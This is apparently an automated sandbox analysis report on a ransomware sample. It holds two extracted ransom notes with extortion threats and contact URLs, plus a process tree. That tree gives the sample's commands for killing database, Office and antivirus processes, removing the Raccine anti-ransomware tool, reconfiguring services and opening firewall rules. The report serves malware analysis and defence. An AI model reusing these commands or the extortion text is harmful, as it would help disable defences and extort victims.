8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7

Resubmissions

16-03-2022 13:15

220316-qg979accak 10

12-05-2021 00:06

210512-y1glnyls5e 10

Analysis

max time kernel
53s
max time network
61s
platform
windows7_x64
resource
win7v20210408
submitted
12-05-2021 00:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e1f063d6_by_Libranalysis.exe
Size

142KB
MD5

e1f063d63a75e0e0e864052b1a50ab06
SHA1

75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
SHA256

8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
SHA512

25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: ____________________________________________________________________________________ You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. _____________________________________________________________________________________ Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: tieafuuz9bcRoe09+p2B570KLGTrtGurtgj3/z5MOFXeSj5F6ex86WPeZwbsxtCvBEVbmouBOI5f81eboOkYB+xcb5WTX8nqJLeT9oAW8C1IMtkypLVMY2PjQ6XtZH/IIB0S5nrKbcAE0/+0FeYWXE2rjoQ9OapROKJzwX/vRGD/eJ29khTAw7QfPz1qM/aqncRAuTRIdNp0tnZv6T6lTGEEh7a5c6p4CpvrS2rgQ/9CIwMj4fRb/a8TJKMDN85Sf2xIhwtREeuwgn62T9q1qXW31zXKLqsbJ6EO0Ofe2iL0UmRvLX2FjlY5QsBz8PGWtnVr0pdQaPnCUAG3GaKVuwXUSSijjmkNgwHfor8JaxhOvhezGvfqsmdNlumqAYYg1reErCyzdc7tuQJUepwjtTB8rKw9C/s5PeXXywkkIT8D+dsiNSD4JjwsvpYf6hv/SaMde/UYatj5va17rsb/oL8nw37mnpSM6V3haeVBUVK3p6wDbWXYaE2bk/q3s6GfQm5eL/+U9GT/ZlwXiwM5TmcKLJyoJUGtWRsWbntE+ez9XDKnHOZNX8t8BNtJGBKpnVLpLeD3fLmhleEwlb1nxhCrk+KYWVtHxf4cJXam2wshQpT5JxoKwM2VZllJO+NjlQctBwUQ7Dmsrtt1E0rkdA0/wFkrLFRuHIjI9N7Apzg=

URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after itâ€™s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: tieafuuz9bcRoe09+p2B570KLGTrtGurtgj3/z5MOFXeSj5F6ex86WPeZwbsxtCvBEVbmouBOI5f81eboOkYB+xcb5WTX8nqJLeT9oAW8C1IMtkypLVMY2PjQ6XtZH/IIB0S5nrKbcAE0/+0FeYWXE2rjoQ9OapROKJzwX/vRGD/eJ29khTAw7QfPz1qM/aqncRAuTRIdNp0tnZv6T6lTGEEh7a5c6p4CpvrS2rgQ/9CIwMj4fRb/a8TJKMDN85Sf2xIhwtREeuwgn62T9q1qXW31zXKLqsbJ6EO0Ofe2iL0UmRvLX2FjlY5QsBz8PGWtnVr0pdQaPnCUAG3GaKVuwXUSSijjmkNgwHfor8JaxhOvhezGvfqsmdNlumqAYYg1reErCyzdc7tuQJUepwjtTB8rKw9C/s5PeXXywkkIT8D+dsiNSD4JjwsvpYf6hv/SaMde/UYatj5va17rsb/oL8nw37mnpSM6V3haeVBUVK3p6wDbWXYaE2bk/q3s6GfQm5eL/+U9GT/ZlwXiwM5TmcKLJyoJUGtWRsWbntE+ez9XDKnHOZNX8t8BNtJGBKpnVLpLeD3fLmhleEwlb1nxhCrk+KYWVtHxf4cJXam2wshQpT5JxoKwM2VZllJO+NjlQctBwUQ7Dmsrtt1E0rkdA0/wFkrLFRuHIjI9N7Apzg=

URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Signatures

Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

704 cmd.exe

pid	process
704	cmd.exe

Drops startup file 1 IoCs

Processes:

e1f063d6_by_Libranalysis.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	e1f063d6_by_Libranalysis.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

e1f063d6_by_Libranalysis.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	e1f063d6_by_Libranalysis.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	e1f063d6_by_Libranalysis.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
664	taskkill.exe
328	taskkill.exe
1340	taskkill.exe
2036	taskkill.exe
1624	taskkill.exe
560	taskkill.exe
1600	taskkill.exe
1508	taskkill.exe
1764	taskkill.exe
1100	taskkill.exe
1668	taskkill.exe
1840	taskkill.exe
876	taskkill.exe
1792	taskkill.exe
1608	taskkill.exe
1804	taskkill.exe
1160	taskkill.exe
952	taskkill.exe
544	taskkill.exe
1608	taskkill.exe
1296	taskkill.exe
1072	taskkill.exe
1060	taskkill.exe
1028	taskkill.exe
1644	taskkill.exe
1148	taskkill.exe
960	taskkill.exe
1468	taskkill.exe
924	taskkill.exe
1600	taskkill.exe
2032	taskkill.exe
1648	taskkill.exe
1640	taskkill.exe
1540	taskkill.exe
1288	taskkill.exe
1952	taskkill.exe
864	taskkill.exe
1340	taskkill.exe
1752	taskkill.exe
304	taskkill.exe
1636	taskkill.exe
932	taskkill.exe
1316	taskkill.exe
1972	taskkill.exe
616	taskkill.exe
988	taskkill.exe
1632	taskkill.exe
1244	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1796 reg.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

664 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1796	reg.exe

pid	process
664	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

e1f063d6_by_Libranalysis.exe

pid	process
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe
1652	e1f063d6_by_Libranalysis.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

e1f063d6_by_Libranalysis.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execonhost.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1652	e1f063d6_by_Libranalysis.exe
Token: SeDebugPrivilege	876	taskkill.exe
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeDebugPrivilege	1640	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	1804	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	864	taskkill.exe
Token: SeDebugPrivilege	1316	taskkill.exe
Token: SeDebugPrivilege	1340	taskkill.exe
Token: SeDebugPrivilege	1972
Token: SeDebugPrivilege	304	taskkill.exe
Token: SeDebugPrivilege	1752	conhost.exe
Token: SeDebugPrivilege	1540	conhost.exe
Token: SeDebugPrivilege	664	taskkill.exe
Token: SeDebugPrivilege	960	taskkill.exe
Token: SeDebugPrivilege	616	taskkill.exe
Token: SeDebugPrivilege	1468	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	544	taskkill.exe
Token: SeDebugPrivilege	328	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	988	taskkill.exe
Token: SeDebugPrivilege	952	taskkill.exe
Token: SeDebugPrivilege	1636	taskkill.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	924	taskkill.exe
Token: SeDebugPrivilege	2036	taskkill.exe
Token: SeDebugPrivilege	1340	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	1632	taskkill.exe
Token: SeDebugPrivilege	1296	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeDebugPrivilege	1764	taskkill.exe
Token: SeDebugPrivilege	560	taskkill.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	1072	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	1100	taskkill.exe
Token: SeDebugPrivilege	1028	taskkill.exe
Token: SeDebugPrivilege	1148	taskkill.exe
Token: SeDebugPrivilege	1244	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	1972	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

e1f063d6_by_Libranalysis.exe

pid process

1652 e1f063d6_by_Libranalysis.exe
1652 e1f063d6_by_Libranalysis.exe
1652 e1f063d6_by_Libranalysis.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

e1f063d6_by_Libranalysis.exe

pid process

1652 e1f063d6_by_Libranalysis.exe
1652 e1f063d6_by_Libranalysis.exe
1652 e1f063d6_by_Libranalysis.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e1f063d6_by_Libranalysis.exe

description	pid	process	target process
PID 1652 wrote to memory of 876	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 876	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 876	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 544	1652	e1f063d6_by_Libranalysis.exe	reg.exe
PID 1652 wrote to memory of 544	1652	e1f063d6_by_Libranalysis.exe	reg.exe
PID 1652 wrote to memory of 544	1652	e1f063d6_by_Libranalysis.exe	reg.exe
PID 1652 wrote to memory of 1796	1652	e1f063d6_by_Libranalysis.exe	reg.exe
PID 1652 wrote to memory of 1796	1652	e1f063d6_by_Libranalysis.exe	reg.exe
PID 1652 wrote to memory of 1796	1652	e1f063d6_by_Libranalysis.exe	reg.exe
PID 1652 wrote to memory of 1840	1652	e1f063d6_by_Libranalysis.exe	schtasks.exe
PID 1652 wrote to memory of 1840	1652	e1f063d6_by_Libranalysis.exe	schtasks.exe
PID 1652 wrote to memory of 1840	1652	e1f063d6_by_Libranalysis.exe	schtasks.exe
PID 1652 wrote to memory of 772	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 772	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 772	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 636	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 636	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 636	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 1296	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 1296	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 1296	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 932	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 932	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 932	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 1244	1652	e1f063d6_by_Libranalysis.exe	netsh.exe
PID 1652 wrote to memory of 1244	1652	e1f063d6_by_Libranalysis.exe	netsh.exe
PID 1652 wrote to memory of 1244	1652	e1f063d6_by_Libranalysis.exe	netsh.exe
PID 1652 wrote to memory of 1876	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 1876	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 1876	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 2036	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 2036	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 2036	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 328	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 328	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 328	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 1120	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 1120	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 1120	1652	e1f063d6_by_Libranalysis.exe	sc.exe
PID 1652 wrote to memory of 1792	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1792	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1792	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1640	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1640	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1640	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1608	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1608	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1608	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 864	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 864	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 864	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1600	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1600	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1600	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1804	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1804	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1804	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 364	1652	e1f063d6_by_Libranalysis.exe	netsh.exe
PID 1652 wrote to memory of 364	1652	e1f063d6_by_Libranalysis.exe	netsh.exe
PID 1652 wrote to memory of 364	1652	e1f063d6_by_Libranalysis.exe	netsh.exe
PID 1652 wrote to memory of 1316	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1316	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1316	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe
PID 1652 wrote to memory of 1340	1652	e1f063d6_by_Libranalysis.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

e1f063d6_by_Libranalysis.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	e1f063d6_by_Libranalysis.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	e1f063d6_by_Libranalysis.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	e1f063d6_by_Libranalysis.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	e1f063d6_by_Libranalysis.exe

C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe
"C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1652
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:876
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:544
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1796
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1840
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:772
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:636
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1296
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:932
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1244
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1876
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:2036
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:328
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:1120
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1792
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1640
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1600
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:864
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1804
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:364
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1316
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:1340
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:1972
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:1896
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:1752
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:1540
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:304
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:960
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:664
